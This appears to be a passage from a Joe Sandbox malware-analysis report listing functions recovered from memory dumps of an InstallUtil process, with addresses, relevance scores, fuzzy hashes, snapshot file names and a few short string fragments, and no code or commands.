Opcode Fuzzy Hash: e172bbda86f335dbeacc1dc544a8fa2ea7f9f2b0894b661b7a60bc4f2fffcd42
Instruction Fuzzy Hash: 21619274E006089FEB14DFAAD994A9DFBF2BF89300F14906AE419AB369DB345941CF50

Function 0171F017 Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 809eb9064fa21d8ebd94777a7e91289cc45f8e4dd8b936c8c2f81069040ff788
Instruction ID: b4ba0de0da94ec04f16694a7126f4508d8f741386f12b9d3907871929760b4df
Opcode Fuzzy Hash: 809eb9064fa21d8ebd94777a7e91289cc45f8e4dd8b936c8c2f81069040ff788
Instruction Fuzzy Hash: FC72AC74E012288FDB65DF69C984BE9FBB2BB49300F1481EAD409A7355EB349E85CF50

Function 05C88608 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f146f94f875405a8236fcc8919945a173fe7a4d1bea835ca3fbddd44364f95
Instruction ID: 9d6a68c452d03f0643aab6e74b89d11c0b512d0ad4b2110655bfcc7ce425ba86
Opcode Fuzzy Hash: a8f146f94f875405a8236fcc8919945a173fe7a4d1bea835ca3fbddd44364f95
Instruction Fuzzy Hash: 7CE1C074E01218CFEB24DFA5C984B9DBBB2BF89304F2081A9D409AB394DB755E85CF51

Function 05C8C9D8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4436e6e81fd1be1f9bbd8ace4dd0524d6311fcda232876d088d6521a338f005
Instruction ID: 170f88c5c2ceb894486851d447bdccb82d1a1098773a84b50ab6ca9c0d4c4800
Opcode Fuzzy Hash: e4436e6e81fd1be1f9bbd8ace4dd0524d6311fcda232876d088d6521a338f005
Instruction Fuzzy Hash: 61A1A170E012288FEB28DF6AC944B9DBAF2BF89300F14C5AAD40DA7254DB745E85CF50

Function 05C8BD38 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c5a7cae11c20cad566e5279effdff41b647703d9c07a74d16c9e6a873ae1f89
Instruction ID: 8355ff1c37e12da696f2315842930748e8561942edebe3997f57ce7030e51c0f
Opcode Fuzzy Hash: 6c5a7cae11c20cad566e5279effdff41b647703d9c07a74d16c9e6a873ae1f89
Instruction Fuzzy Hash: 23A1AF74E012288FEB28DF6AC944B9DBBF2BF89304F14C5AAD409A7255DB345E85CF50

Function 05C8A408 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b84b6e88b77f48ecaddcaeaac9d50d24fb7d52eff46f2d5bd114f7d564f9f9e5
Instruction ID: 5c319f1370e75fb206ad9a2c3517235f6240ce28c4bb5d9eb38dd82be4c18f67
Opcode Fuzzy Hash: b84b6e88b77f48ecaddcaeaac9d50d24fb7d52eff46f2d5bd114f7d564f9f9e5
Instruction Fuzzy Hash: 18A1B074E016288FEB68DF6AC944B9DBBF2BF89300F14C5AAD40DA7254DB345A85CF50

Function 05C8C388 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 956a4dbb16679e63bbc2a43eb409c667da088eb4133cf5f581a6539240b73e4b
Instruction ID: d796e05f906763ea9caca00a6b9104b53132c3299fa5a8e73e903446c3bfc519
Opcode Fuzzy Hash: 956a4dbb16679e63bbc2a43eb409c667da088eb4133cf5f581a6539240b73e4b
Instruction Fuzzy Hash: BEA1A370E052188FEB28DF6AD944B9DBAF2BF89304F14C4AAD409A7254DB745E85CF60

Function 05C8B6E8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7b570da5f0590bef33037b10b56b6545df734abba94bf9f212e63c7a4f69c0
Instruction ID: fdc3f04ab26defc70e2d9f4d723b5dab0a3dccd53eabf713aed27400f4b5a2a3
Opcode Fuzzy Hash: be7b570da5f0590bef33037b10b56b6545df734abba94bf9f212e63c7a4f69c0
Instruction Fuzzy Hash: E5A1AF70E012288FEB28DF6AC944B9DFAF2BF89304F14C5AAD40DA7255DB345A85CF50

Function 05C8D670 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05539ec00919bc6a499b8af1b762444b19283ef4ed1f7417e6465f9f8aa5b09b
Instruction ID: 746b61651a3a8a5df37218d9500e803b1cbe17de5f2662e383ccd2fa79ef351b
Opcode Fuzzy Hash: 05539ec00919bc6a499b8af1b762444b19283ef4ed1f7417e6465f9f8aa5b09b
Instruction Fuzzy Hash: 80A1AF70E012288FEB28DF6AC944B9DBBF2BF89304F14C5AAD40DA7255DB745A85CF50

Function 05C8B0A0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3ca6f93f223fdf8ac90c9237a32117db2d0afbee7d07cd6239dd52efbcd437
Instruction ID: 988c3d5d1d233f255cfb454a422542fa89071cc0b14e098bcb5d98fff4f54e75
Opcode Fuzzy Hash: fd3ca6f93f223fdf8ac90c9237a32117db2d0afbee7d07cd6239dd52efbcd437
Instruction Fuzzy Hash: ABA1A070E012288FEB28DF6AC944B9DFAF2BF89304F14C5AAD409A7254DB345E85CF50

Function 05C8D028 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fec0a085b31dfd1c85b2254276b2e272bfc99cb686df6f9008be250dceddcbf
Instruction ID: f11abadf99e75fbf0662cf824f889d152151bc66c4f4987e8adc437bdc11ed86
Opcode Fuzzy Hash: 6fec0a085b31dfd1c85b2254276b2e272bfc99cb686df6f9008be250dceddcbf
Instruction Fuzzy Hash: 8AA19270E012288FEB68DF6AC944B9DBBF2BF89304F14C5AAD40DA7254DB345A85CF50

Function 05C8AA58 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be0e38c1badc3bfcb8acca85ed27201a6118ac7b8c2fba6c2362dd9b4afdb3e2
Instruction ID: e668eb335f898927bdd980786c3ce7a217a90778a0d4a2a912ec76210fb41372
Opcode Fuzzy Hash: be0e38c1badc3bfcb8acca85ed27201a6118ac7b8c2fba6c2362dd9b4afdb3e2
Instruction Fuzzy Hash: A5A1A174E012288FEB28DF6AC944B9DFBF2BF89304F14C4AAD409A7254DB745A85CF50

Function 05C8D018 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bad9ca6ce71accb92a5750cd60879406808821da46e0792906f8ce7d0f87b12
Instruction ID: e36f18483277273d530da4f7d84ac5ae08b0b4627aba3375b1dc53caf58de526
Opcode Fuzzy Hash: 6bad9ca6ce71accb92a5750cd60879406808821da46e0792906f8ce7d0f87b12
Instruction Fuzzy Hash: FC718371E016288FEB68DF6AC944B9DBAF2AF89200F14C4AAD40DA7254DB344A85CF50

Function 05C8AA48 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca370303d4072850538db3f028f02832f31172452457db65d27afa751c5012c
Instruction ID: 24796eddbb2528fd01d6598c21c02ea7e9460fbaa43b8a580fddb878eb1c9002
Opcode Fuzzy Hash: eca370303d4072850538db3f028f02832f31172452457db65d27afa751c5012c
Instruction Fuzzy Hash: 8C7183B1E006188FEB68DF6AC944799FAF2BF89304F14C4AAD40DA7254DB744A85CF50

Function 05C8B097 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 708ddc355174233cba07305a7da5716670f37d45992f83413b70e54bef5a71de
Instruction ID: 92beef60bfa478a299a905e34b89f884245719578c793bcbb62366b3f0f5954c
Opcode Fuzzy Hash: 708ddc355174233cba07305a7da5716670f37d45992f83413b70e54bef5a71de
Instruction Fuzzy Hash: 9B7184B1E006188FEB68DF6AC944B9DFAF2BF89304F14C5AAD40DA7254DB345A85CF11

Function 05C885F8 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d086141108bda0b30a1592521d32a7ced229e468f8a9860c1f2be6d309dd76e7
Instruction ID: be10302b1843ee7aa55074ad9f0010bda70564a037913e915dfd28c07931fbec
Opcode Fuzzy Hash: d086141108bda0b30a1592521d32a7ced229e468f8a9860c1f2be6d309dd76e7
Instruction Fuzzy Hash: F241C2B0D006088BEB18DFAAC9547EEBBF2BF88304F54C4A9C418BB294DB755946CF54

Function 05C8A3F8 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26787336fed3ccbf5820b41bcc7e408753a3bfdcbf6f807fad6be7ce398d37f5
Instruction ID: e5026c9eaaa67fe4376d2f05dae72238f88bb6f9f8440d502eb4c86813effc42
Opcode Fuzzy Hash: 26787336fed3ccbf5820b41bcc7e408753a3bfdcbf6f807fad6be7ce398d37f5
Instruction Fuzzy Hash: 724179B1D016188BEB58CF6BCD4579AFAF3BFC9310F14C1AAC50CA6264EB740A858F50

Function 05C8C9C8 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 850cf7b3d943c2717aef7c3105c9ee63a410e0a7d23ddb2d3a2b5ad871a1e06e
Instruction ID: 808f709624628adc857ff9585d160275e6dd8aa67d66689c0d776163a371aee2
Opcode Fuzzy Hash: 850cf7b3d943c2717aef7c3105c9ee63a410e0a7d23ddb2d3a2b5ad871a1e06e
Instruction Fuzzy Hash: B34167B1E016188BEB58CF6BCD557DAFAF3AFC9304F04C1AAC50CA6264DB740A858F50

Function 05C8D662 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0246c0c6cab42c10a192e7d1bfc86fcfcce4e55deba8b4c7314c2d6577df8b1e
Instruction ID: 8407dae4b42504580a5e98159ac42dccb0d368249e0f959bf81c451ce3527e45
Opcode Fuzzy Hash: 0246c0c6cab42c10a192e7d1bfc86fcfcce4e55deba8b4c7314c2d6577df8b1e
Instruction Fuzzy Hash: 074157B1E016189BEB58CF6BC94579AFAF3AFC9304F14C1AAC50CA6264DB740A858F51

Function 05C8BD28 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd73306ab9c9d87af9afb64b0268fa2a1b53adf9c8b30fd625edd8b6840ea5a6
Instruction ID: 58acce64e982c0ff17fd384dac28c2570568d40fda0bbe41ff8c071a00cfe277
Opcode Fuzzy Hash: bd73306ab9c9d87af9afb64b0268fa2a1b53adf9c8b30fd625edd8b6840ea5a6
Instruction Fuzzy Hash: B64159B1D016188BEB58CF6BD9557DAFAF3BFC8304F14C1AAC50CA6264EB740A858F51

Function 05C8C378 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c1b578ed38691a076cb244e99b59f00a29dbd32287968077a77788ef7d75e9
Instruction ID: a07affa46e4584bfd1336533907ce9d3b9aa5cbd88da957f6a0ad9d833ac08cb
Opcode Fuzzy Hash: 07c1b578ed38691a076cb244e99b59f00a29dbd32287968077a77788ef7d75e9
Instruction Fuzzy Hash: 56416AB1D016189BEB58CF6BDD557DAFAF3AFC8304F04C1AAD50CA6264EB740A858F50

Function 05C8B6D9 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bac486b43163818dc79f039ea2b76c89061c5d1bfae8e30fb6869e207ad6f19
Instruction ID: c9a5a2e05fe228dc7f7564d451d97a3f1cb656bdd73888b058fed4db73b447fe
Opcode Fuzzy Hash: 7bac486b43163818dc79f039ea2b76c89061c5d1bfae8e30fb6869e207ad6f19
Instruction Fuzzy Hash: 074167B1E016188BEB58CF6BCD4579AFAF3BFC9304F04C1AAC50CA6264DB740A858F55

Function 01716E70 Relevance: 10.5, Strings: 8, Instructions: 498COMMON

Download Yara Rule

Strings

(oq, xrefs: 01716EAE
(oq, xrefs: 01716F95
,q, xrefs: 01717310
(oq, xrefs: 01717032
(oq, xrefs: 0171737F
,q, xrefs: 01717320
(oq, xrefs: 01716F69
(oq, xrefs: 0171738F

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: e7d01f32c07f5b1f26db8859c05987f3b8e63189e97ef1e0540ce18bdc2c34b4
Instruction ID: c8e906e43f77982e056fbb0fb562a3d88e952d84e099e9df99f0884b2b9f6ac5
Opcode Fuzzy Hash: e7d01f32c07f5b1f26db8859c05987f3b8e63189e97ef1e0540ce18bdc2c34b4
Instruction Fuzzy Hash: A5223934A002489FDB29CF6CD884AAEBBF2BF89314F158599F905DB265DB31ED41CB50

Function 01718801 Relevance: 4.3, Strings: 3, Instructions: 509COMMON

Download Yara Rule

Strings

;q, xrefs: 01718C44
4'q, xrefs: 0171884F
4'q, xrefs: 01718829

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'q$4'q$;q
API String ID: 0-144927120
Opcode ID: 13823e6a9f7ad7757f357799c7f418e6f2a801aef33550acd213c4d5fe2859db
Instruction ID: d2647ac1904f607d408d1f1e13c5f996a2700fd2301e65daa54a22cc7c66c54c
Opcode Fuzzy Hash: 13823e6a9f7ad7757f357799c7f418e6f2a801aef33550acd213c4d5fe2859db
Instruction Fuzzy Hash: E2F1BF303106018FEB259A2DC859739BAA6FF85740F1904EAE552CF3BADA25CC81C793

Function 01717808 Relevance: 3.2, Strings: 2, Instructions: 702COMMON

Download Yara Rule

Strings

$q, xrefs: 0171834F
$q, xrefs: 0171832C

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: f911844bfe7d8973726de1e7a90b69bcc66053a30244255cd0ec4c53b480f328
Instruction ID: 7e60712533c4ecfef6d61fc531f0f394e05cee59ef88b581c65f3a2f0024fc8b
Opcode Fuzzy Hash: f911844bfe7d8973726de1e7a90b69bcc66053a30244255cd0ec4c53b480f328
Instruction Fuzzy Hash: 2C52F334E002198FEB259BA4C864B9EBBB3FB98300F1081ADD11A6B794DF355D86DF51

Function 017156B0 Relevance: 2.8, Strings: 2, Instructions: 323COMMON

Download Yara Rule

Strings

Hq, xrefs: 0171579B
Hq, xrefs: 017157CE

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: b008a2f7d15c8b51f2bb66e57ddfa1502b65139b4eb0576bced34f3073028175
Instruction ID: ec0d2ae4d111730d8c50cc32c76e757dcab1d51f9919e90364d422a72ec13fb1
Opcode Fuzzy Hash: b008a2f7d15c8b51f2bb66e57ddfa1502b65139b4eb0576bced34f3073028175
Instruction Fuzzy Hash: 07B1AD317042148FDB199F3CD895B2ABFA2ABCA310F188569E806CB399DF74DC41D791

Function 01715C10 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

,q, xrefs: 01715CF0
,q, xrefs: 01715CE6

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: 71638809b66c42048ff1cbf21678d5e568d9f0806703a1ae088fcb35f29e8488
Instruction ID: bc460b21f21594c2585a0861cbd300a44030516caac53deca563faceea654284
Opcode Fuzzy Hash: 71638809b66c42048ff1cbf21678d5e568d9f0806703a1ae088fcb35f29e8488
Instruction Fuzzy Hash: 7A817134B005058FDB18CF6DC8889AAFBB6FFCA214B548169D506DB369DB31EC42CB91

Function 05C89510 Relevance: 2.7, Strings: 2, Instructions: 210COMMON

Download Yara Rule

Strings

(&q, xrefs: 05C8962B
(q, xrefs: 05C896EA

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID: (&q$(q
API String ID: 0-2464455664
Opcode ID: 352d49e21212c11762de5b8ed8605173939574aaa98b48bf13fb45650c1ef21a
Instruction ID: cca06c84e8d2317576849978afd124192192b2ecbb59e02594d335c3c3c49409
Opcode Fuzzy Hash: 352d49e21212c11762de5b8ed8605173939574aaa98b48bf13fb45650c1ef21a
Instruction Fuzzy Hash: A6717231F042199FEB19EBA5D8506EE7BB2BFC8600F548529E406A7380DE349D42C7A5

Function 01713428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xq, xrefs: 01713435
Xq, xrefs: 0171345E

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: db148aa794bafbd719e7cd7b39b3d36c6f3979493ba9b57b96d3f7c03a873c2e
Instruction ID: 958c60304577bbcf0b0fccfd6a12ee6186fd7bbfef4a73630456d5f71fd53941
Opcode Fuzzy Hash: db148aa794bafbd719e7cd7b39b3d36c6f3979493ba9b57b96d3f7c03a873c2e
Instruction Fuzzy Hash: 1531E975B403148BEF294ABD489527EF9AABBC4621F28407EED1BD7388DF74CC058691

Function 01710C8F Relevance: 1.7, Strings: 1, Instructions: 403COMMON

Download Yara Rule

Strings

LRq, xrefs: 01710E5E

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 490afb5d871d65c34fa07ad23c020818e57a34d4a2241e16c9eca9dcae85ee2e
Instruction ID: 33533aef95e00199090793781e010882eb3ddd029f3e520ee7d9d396513dd1de
Opcode Fuzzy Hash: 490afb5d871d65c34fa07ad23c020818e57a34d4a2241e16c9eca9dcae85ee2e
Instruction Fuzzy Hash: 22226274E006198FCB54DF64EC95A9DBBB2FF49301F1082AAE80AA7354DB386D95CF41

Function 01710CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LRq, xrefs: 01710E5E

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: b61b4c6ed93442dcfc575aa8f298344d3f949c362c4b21cac0be06de8ffd72e7
Instruction ID: 4b9c3c0966fd670de1e0962ba615ab3149fabe93bb0322249c62acf33cb42d10
Opcode Fuzzy Hash: b61b4c6ed93442dcfc575aa8f298344d3f949c362c4b21cac0be06de8ffd72e7
Instruction Fuzzy Hash: A5225274E006198FCB54DF64EC95A9DBBB2FF49301F1081AAE80AA7354DB386D95CF41

Function 0171A660 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

(oq, xrefs: 0171A7E9

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-1999159160
Opcode ID: 6abf9e6dbbd67143ef0e222fcdb3b9116041ba6f33786045f49c9eab971596be
Instruction ID: 22ac02d12235475167e97fec4d278b68fa0e3e4e13e6dd27c62f684cd771339b
Opcode Fuzzy Hash: 6abf9e6dbbd67143ef0e222fcdb3b9116041ba6f33786045f49c9eab971596be
Instruction Fuzzy Hash: 9141F0367006049FCB159B78D855AAEBFB7BFC8311F14846AE506EB395DE309C02CBA0

Function 0171A828 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a90ab439a6fed4eb44fd3a102a3213547cadd8c5011a9ec5b65a3b24e6659084
Instruction ID: 071bf28b8706ff5fc3bccfa6c66c413ab8b6259fe3be9537490ffde0dd93c24e
Opcode Fuzzy Hash: a90ab439a6fed4eb44fd3a102a3213547cadd8c5011a9ec5b65a3b24e6659084
Instruction Fuzzy Hash: 70F14A75A016548FCB05CF6CC988AADFBF6BF89310B1A8469E505EB366DB31EC41CB50

Function 01717450 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb0445574f1be7261c8cc471c65bedcd853e25fd016a7bbc0bbd6daf499d3716
Instruction ID: d353df875e73cfa975fd4d5c1966de43cbe76a012e5cb4316b5c720c7a30ed75
Opcode Fuzzy Hash: eb0445574f1be7261c8cc471c65bedcd853e25fd016a7bbc0bbd6daf499d3716
Instruction Fuzzy Hash: 6E7116347002458FDB19DF2CC888A6ABBF6AF49340F1944A9E915CB3B5DB75EC41CB91

Function 05C8FC20 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3716931435.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5c80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 739b79b7d0124c8cd93ac3999f081079d74a8389a4f019907fb1d1a7101642ff
Instruction ID: 4fb2e10ab5062458f73bcd9ca705a7d7fa9ac7c54be12e177b49cfe2eba7bda2
Opcode Fuzzy Hash: 739b79b7d0124c8cd93ac3999f081079d74a8389a4f019907fb1d1a7101642ff
Instruction Fuzzy Hash: EC711474E00319CFDB15EFB5D858AADBBB2BF88301F14852AE506AB254DF349A42CF45

Function 0171CED7 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8812b33ad0738c31e0830a57a6943495cd1c7e31c75278e9948617db2723d570
Instruction ID: e3443874edb17d425cea9ccc02f51b2cca13310fe50a334be0cb76c88113fb16
Opcode Fuzzy Hash: 8812b33ad0738c31e0830a57a6943495cd1c7e31c75278e9948617db2723d570
Instruction Fuzzy Hash: D151CE30132A928FC3102B60A9AE13ABFB4FB4F7177427DA6B10FC50199F746099EB11

Function 0171CEE8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3708924817.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

